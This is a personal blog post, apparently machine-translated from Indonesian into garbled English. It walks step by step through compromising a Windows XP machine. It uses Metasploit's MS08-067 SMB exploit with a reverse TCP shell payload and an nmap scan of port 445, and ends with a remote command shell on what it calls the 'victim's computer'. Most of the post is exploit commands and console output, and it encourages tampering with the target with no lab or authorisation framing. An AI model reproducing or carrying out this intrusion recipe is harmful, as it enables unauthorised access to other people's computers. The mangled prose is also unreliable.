http://www.prcheckingtool.com

Jumat, 20 Mei 2011

Peeking through the computer data network


Already nearly 5 hours fesbuk a while donlot movie, really boring job, let alone waiting for downloads with bandwidth 15kbps 700mb, very very boring (boring). Instead of mending blank writing articles,,, hehe although this article is already spoiled for teachers and all temperatures, but I think there are still many who need the outside sono neh knowledge, because this is just share aja,,, (laughing). th3k1n9 return! jiahhhhhh
Maybe for winduz engine users are some tools you need to download (donlot) first before doing this experiment (laugh out loud until the exit ingussssssss). Some of the tools that need to be prepared include:


   
1. Metasploit (om th3w1tch mainstay tools);
   
2. Nmap;
   
3. A cup of coffee + +
   
4. A cigarette already enough (do not need a pack, hehe).



For users of machine Tux (Linux), especially for distributions b | t (backtrack), need not be again. Because already there. Next run these tools. For tutors this time I use the distro b | t pre-final with metasploit Version 3. Ne need not be wet-wet ... Run metasploitnya and use the command "show exploits" (without the quotes), to see a list of exploits that could be used to perform exploitation.
msf> show exploits
Use of exploits: "windows/smb/ms08_067_netapi"
msf> use windows/smb/ms08_067_netapi msf exploit (ms08_067_netapi)>
Furthermore, a sip of coffee and then see a list of payload that can be used, in accordance with the method exploits. This time we use payload "windows / shell / reverse_tcp" to exploit the dos prompt the target.
msf exploit (ms08_067_netapi)> set payload windows / shell / reverse_tcp payload => windows / shell / reverse_tcp
Determine the target which we will enter, for example a computer with IP address: 192.168.0.2 to be attacked on technique this time.
msf exploit (ms08_067_netapi)> set rhost 192.168.0.2 rhost => 192.168.0.2
Set the computer used to conduct exploitation, (in this case our computer). msf exploit (ms08_067_netapi)> set LHOST 192.168.0.1 LHOST => 192.168.0.1
Furthermore, before executing the attack on the target computer, we make sure all bumbu2 is ready,,, (.... fried chicken prepared in wkwkwkwkwkwkwk), by using the show command options.
msf exploit (ms08_067_netapi)> show options
Module options:

   
Name Current Setting Required Description
   
---- --------------- -------- -----------
   
RHOST yes The target address 192.168.0.2
   
445 RPORT yes Set the SMB service port
   
BROWSER SMBPIPE yes The pipe name to use (BROWSER, SRVSVC)

Payload options (windows / shell / reverse_tcp):

   
Name Current Setting Required Description
   
---- --------------- -------- -----------
   
EXITFUNC thread yes Exit technique: seh, thread, process
   
LHOST yes The local address 192.168.0.1
   
LPORT 4444 yes The local port

Exploit targets:

   
My Name
   
- ----
   
0 Automatic Targeting
Note the port used for an attack on the target computer (port 445), make sure the port is open on the victim's computer by the tools "nmap".
root @ th3k1n9-laptop: ~ # nmap 192.168.0.2
Starting Nmap 4.85BETA10 (http://nmap.org) at 2011-03-05 07:06 ET Interesting ports on 192.168.0.2: Not shown: 997 closed ports PORT STATE SERVICE 135/tcp open msrpc 139/tcp open netbios-SSN 445/tcp open microsoft-ds MAC Address: 08:00:27:23: FD: CB (Cadmus Computer Systems)
Nmap done: 1 IP address (1 host up) Scanned in 1.72 seconds

The end of our struggle this time, run the exploit ............. wkwkwkwkkwkwkwkkwkwkkwkw destroyed during depannyaaaaaaaaaaaa
msf exploit (ms08_067_netapi)> exploit
[*] Handler binding to LHOST 0.0.0.0 [*] Started reverse handler [*] Automatically detecting the target ... [*] Fingerprint: Windows XP Service Pack 2 - lang: Home [*] Selected Target: Windows XP SP2 Home (NX) [*] Triggering the vulnerability ... [*] Sending Stage (474 ​​bytes) [*] Command shell session 1 opened (192.168.0.1:4444 -> 192.168.0.2:1048)
Microsoft Windows XP [Version 5.1.2600] (C) Copyright 1985-2001 Microsoft Corp..
C: \ WINDOWS \ system32>
Well,,, kalo dah until the appearance of the above, I do not need to say anything else because you definitely dah you all understand (understand). Please taste the chicken. Up here you live playing skills to tamper with the victim's computer through DOS Prompt. Regards, see you!

»Author: buqento» Written: Sat, March 5, 2011 

Tidak ada komentar:

Posting Komentar